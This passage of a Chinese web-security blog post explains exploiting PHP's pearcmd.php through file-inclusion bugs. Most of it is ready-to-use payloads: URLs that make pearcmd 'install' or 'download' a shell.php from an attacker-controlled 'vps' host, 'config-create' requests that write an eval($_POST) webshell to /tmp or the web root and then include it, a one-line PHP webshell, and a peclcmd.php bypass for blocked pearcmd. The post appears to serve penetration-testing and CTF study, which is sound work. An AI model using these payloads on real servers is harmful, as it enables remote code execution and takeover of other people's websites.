<h4 id="download—–下载一个文件包"><a href="#download—–下载一个文件包" class="headerlink" title="download—–下载一个文件包"></a>download—–下载一个文件包</h4><figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs ruby">pear down <span class="hljs-symbol">http:</span>/<span class="hljs-regexp">/vps/phpinfo</span>.php<br><br><span class="hljs-comment"># 利用</span><br><span class="hljs-string">?+</span>download+<span class="hljs-symbol">http:</span>/<span class="hljs-regexp">/vps/phpinfo</span>.php&amp;file=<span class="hljs-regexp">/usr/share</span><span class="hljs-regexp">/php/pearcmd</span>.php<br></code></pre></td></tr></table></figure>


<p>&emsp;&emsp;需要我们在服务器建一个目录：<strong>phpinfo.php&amp;file&#x3D;&#x2F;usr&#x2F;share&#x2F;php&#x2F;</strong>，并且将恶意的php命名为：<strong>pearcmd.php</strong>，创建：&amp;file&#x3D;&#x2F;usr&#x2F;share&#x2F;php&#x2F;目录，放入pearcmd.php然后文件包含pearcmd.php就可以利用了</p>
<h2 id="相关利用"><a href="#相关利用" class="headerlink" title="相关利用"></a>相关利用</h2><h3 id="出网"><a href="#出网" class="headerlink" title="出网"></a>出网</h3><h4 id="install"><a href="#install" class="headerlink" title="install"></a>install</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span> @<span class="hljs-keyword">eval</span>(<span class="hljs-variable">$_POST</span>[cmd]);<span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>
<p>&emsp;&emsp;访问index.php（存在文件包含）</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">?file=/usr/local/lib/php/pearcmd.php&amp;+install+http:<span class="hljs-comment">//vps/shell.php</span><br></code></pre></td></tr></table></figure>
<p>&emsp;&emsp;文件默认下载到&#x2F;tmp&#x2F;pear&#x2F;download&#x2F;shell.php<br>可以使用-R指定目录</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">?file=/usr/local/lib/php/pearcmd.php&amp;+install+-R+/tmp+http:<span class="hljs-comment">//vps/shell.php</span><br></code></pre></td></tr></table></figure>
<p>&emsp;&emsp;就能将文件下载到&#x2F;tmp&#x2F;shell.php</p>
<h4 id="download"><a href="#download" class="headerlink" title="download"></a>download</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">?file=/usr/local/lib/php/pearcmd.php&amp;+download+http:<span class="hljs-comment">//vps/shell.php</span><br></code></pre></td></tr></table></figure>
<p> &emsp;&emsp;默认下载到&#x2F;var&#x2F;www&#x2F;html&#x2F;shell.php<br> download的一种巧妙的构造 </p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">?+download+http:<span class="hljs-comment">//vps/shell.php&amp;file=/usr/share/php/pearcmd.php</span><br></code></pre></td></tr></table></figure>
<p>&emsp;&emsp;这种构造方式有点巧妙，需要我们在服务器建一个目录：shell.php&amp;file&#x3D;&#x2F;usr&#x2F;share&#x2F;php&#x2F;，并且将恶意的php命名为：<strong>pearcmd.php</strong></p>
<p>&emsp;&emsp;其实也可以这么写，去掉上面的shell.php：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">?+download+http:<span class="hljs-comment">//vps/&amp;file=/usr/share/php/pearcmd.php</span><br></code></pre></td></tr></table></figure>
<p>&emsp;&emsp;创建：&amp;file&#x3D;&#x2F;usr&#x2F;share&#x2F;php&#x2F;目录，放入pearcmd.php<br>&emsp;&emsp;然后文件包含pearcmd.php就可以利用了</p>
<h3 id="不出网"><a href="#不出网" class="headerlink" title="不出网"></a>不出网</h3><h4 id="config-create"><a href="#config-create" class="headerlink" title="config-create"></a>config-create</h4><h5 id="当地址为-usr-local-lib-php-pearcmd-php时"><a href="#当地址为-usr-local-lib-php-pearcmd-php时" class="headerlink" title="当地址为&#x2F;usr&#x2F;local&#x2F;lib&#x2F;php&#x2F;pearcmd.php时"></a>当地址为&#x2F;usr&#x2F;local&#x2F;lib&#x2F;php&#x2F;pearcmd.php时</h5><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">/index.php?+config-create+/&amp;file=/usr/local/lib/php/pearcmd.php&amp;/<span class="hljs-meta">&lt;?=</span><span class="hljs-keyword">eval</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-number">1</span>]);<span class="hljs-meta">?&gt;</span>+/tmp/shell.php<br></code></pre></td></tr></table></figure>


<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">/index.php?file=/tmp/shell.php<br></code></pre></td></tr></table></figure>
<p>或者</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">?file=/usr/local/lib/php/pearcmd.php&amp;+config-create+/<span class="hljs-meta">&lt;?=</span><span class="hljs-keyword">eval</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-number">1</span>]);<span class="hljs-meta">?&gt;</span>+/tmp/shell.php<br></code></pre></td></tr></table></figure>


<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">/?file=/tmp/shell.php<br></code></pre></td></tr></table></figure>


<h5 id="不过当地址为-www-server-php-52-lib-php-pearcmd-php的时候"><a href="#不过当地址为-www-server-php-52-lib-php-pearcmd-php的时候" class="headerlink" title="不过当地址为&#x2F;www&#x2F;server&#x2F;php&#x2F;52&#x2F;lib&#x2F;php&#x2F;pearcmd.php的时候"></a>不过当地址为&#x2F;www&#x2F;server&#x2F;php&#x2F;52&#x2F;lib&#x2F;php&#x2F;pearcmd.php的时候</h5><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">/?file=/www/server/php/<span class="hljs-number">52</span>/lib/php/pearcmd.php&amp;+config-create+/<span class="hljs-meta">&lt;?=</span><span class="hljs-keyword">eval</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-number">1</span>]);<span class="hljs-keyword">die</span>()<span class="hljs-meta">?&gt;</span>+/tmp/shell.php<br></code></pre></td></tr></table></figure>

<p>或者</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">/index.php?+config-create+/<span class="hljs-meta">&lt;?=</span><span class="hljs-keyword">eval</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-number">1</span>]);&gt;+/<span class="hljs-keyword">var</span>/www/html/shell.php<br></code></pre></td></tr></table></figure>

<h1 id="绕过"><a href="#绕过" class="headerlink" title="绕过"></a>绕过</h1><h4 id="禁用pearcmd"><a href="#禁用pearcmd" class="headerlink" title="禁用pearcmd"></a>禁用pearcmd</h4><p>&emsp;&emsp;我们可以把文件名字换成 peclcmd.php， 在这个php文件当中其实就是引入了pearcmd.php：</p>
<figure class="highlight lasso"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs lasso"><span class="hljs-keyword">if</span> (<span class="hljs-string">&#x27;/www/server/php/52/lib/php&#x27;</span> != <span class="hljs-string">&#x27;@&#x27;</span>.<span class="hljs-symbol">&#x27;include_path&#x27;</span>.<span class="hljs-string">&#x27;@&#x27;</span>) &#123;<br>    ini_set(<span class="hljs-string">&#x27;include_path&#x27;</span>, <span class="hljs-string">&#x27;/www/server/php/52/lib/php&#x27;</span>);<br>    $raw = <span class="hljs-literal">false</span>;<br>&#125; <span class="hljs-keyword">else</span> &#123;<br>    <span class="hljs-comment">// this is a raw, uninstalled pear, either a cvs checkout, or php distro</span><br>    $raw = <span class="hljs-literal">true</span>;<br>&#125;<br><span class="hljs-class"><span class="hljs-keyword">define</span></span>(<span class="hljs-string">&#x27;PEAR_RUNTYPE&#x27;</span>, <span class="hljs-string">&#x27;pecl&#x27;</span>);<br>require_once <span class="hljs-string">&#x27;pearcmd.php&#x27;</span>;<span class="hljs-comment">//这里包含了pearcmd.php</span><br><br></code></pre></td></tr></table></figure>

<h3 id="参考文档"><a href="#参考文档" class="headerlink" title="参考文档"></a>参考文档</h3><p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/GTL-JU/p/16831585.html">https://www.cnblogs.com/GTL-JU/p/16831585.html</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/yuy0ung/articles/18220835">https://www.cnblogs.com/yuy0ung/articles/18220835</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/RABCDXB/article/details/122050370">https://blog.csdn.net/RABCDXB/article/details/122050370</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/m0_63716101/article/details/134638850">https://blog.csdn.net/m0_63716101/article/details/134638850</a></p>
<p><a target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html">https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html</a></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/web/" class="print-no-link">#web</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>web安全之pearcmd.php的利用</div>
      <div>https://kivvs.github.io/2026/08/14/web安全之pearcmd-php的利用/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>kivvs</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2026年8月14日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2026/08/14/SQL-quine%E6%B3%A8%E5%85%A5/" title="SQL quine注入">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">SQL quine注入</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2026/08/14/file_put_content%E6%AD%BB%E4%BA%A1%E6%9D%82%E7%B3%85/" title="file_put_content死亡杂糅">
                        <span class="hidden-mobile">file_put_content死亡杂糅</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
    <div id="giscus" class="giscus"></div>
    <script type="text/javascript">
      Fluid.utils.loadComments('#giscus', function() {
        var options = {"repo":"kivvs/kivvs.github.io","repo-id":"R_kgDOT3J6Jg","category":"Announcements","category-id":"DIC_kwDOT3J6Js4DDSMc","theme-light":"light","theme-dark":"dark","mapping":"pathname","reactions-enabled":1,"emit-metadata":0,"input-position":"top","lang":"zh-CN"};
        var attributes = {};
        for (let option in options) {
          if (!option.startsWith('theme-')) {
            var key = option.startsWith('data-') ? option : 'data-' + option;
            attributes[key] = options[option];
          }
        }
        var light = 'light';
        var dark = 'dark';
        window.GiscusThemeLight = light;
        window.GiscusThemeDark = dark;
        attributes['data-theme'] = document.documentElement.getAttribute('data-user-color-scheme') === 'dark' ? dark : light;
        for (let attribute in attributes) {
          var value = attributes[attribute];
          if (value === undefined || value === null || value === '') {
            delete attributes[attribute];
          }
        }
        var s = document.createElement('script');
        s.setAttribute('src', 'https://giscus.app/client.js');
        s.setAttribute('crossorigin', 'anonymous');
        for (let attribute in attributes) {
          s.setAttribute(attribute, attributes[attribute]);
        }
        var ss = document.getElementsByTagName('script');
        var e = ss.length > 0 ? ss[ss.length - 1] : document.head || document.documentElement;
        e.parentNode.insertBefore(s, e.nextSibling);
      });
    </script>
    <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid- /hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    function isExpandAllEnabled() {
      return CONFIG.toc && CONFIG.toc.expand_all === true;
    }
    function expandAllToc() {
      if (!isExpandAllEnabled()) { return; }
      jQuery('#toc-body .tocbot-is-collapsed').removeClass('tocbot-is-collapsed');
    }
    function updateTocToggle($li, $childList) {
      var $toggle = $li.children('.toc-toggle');
      if ($toggle.length === 0) { return; }
      var collapsed = $childList.hasClass('tocbot-is-collapsed');
      $toggle
        .toggleClass('toc-toggle-collapsed', collapsed)
        .toggleClass('toc-toggle-expanded', !collapsed);
    }
    function bindTocToggle() {
      if (!isExpandAllEnabled()) { return; }
      jQuery('#toc-body .toc-list-item').each(function() {
        var $li = jQuery(this);
        var $childList = $li.children('ol');
        if ($childList.length === 0) {
          if ($li.children('.toc-toggle').length === 0) {
            $li.prepend('<span class="toc-toggle toc-toggle-placeholder" aria-hidden="true">›</span>');
          }
          return;
        }

        if ($li.children('.toc-toggle').length === 0) {
          $li.prepend('<span class="toc-toggle toc-toggle-expanded" aria-hidden="true">›</span>');
        }
        updateTocToggle($li, $childList);
      });
      jQuery('#toc-body').off('click.tocToggle').on('click.tocToggle', '.toc-toggle', function(e) {
        e.preventDefault();
        e.stopPropagation();
        var $li = jQuery(this).parent('.toc-list-item');
        var $childList = $li.children('ol');
        if ($childList.length === 0) { return; }
        $childList.toggleClass('tocbot-is-collapsed');
        updateTocToggle($li, $childList);
      });
      if (!window.__tocToggleObserver) {
        window.__tocToggleObserver = new MutationObserver(function(mutations) {
          mutations.forEach(function(mutation) {
            if (mutation.type !== 'attributes' || mutation.attributeName !== 'class') { return; }
            var $list = jQuery(mutation.target);
            var $li = $list.parent('.toc-list-item');
            if ($li.length === 0) { return; }
            updateTocToggle($li, $list);
          });
        });
        jQuery('#toc-body ol').each(function() {
          window.__tocToggleObserver.observe(this, { attributes: true });
        });
      }
    }
    var tocConfig = Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc);
    if (isExpandAllEnabled()) {
      tocConfig.collapseDepth = 6;
    }
    window.tocbot.init(tocConfig);
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }
    expandAllToc();
    bindTocToggle();

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
        expandAllToc();
        bindTocToggle();
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script defer src="/js/openkounter.js" ></script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
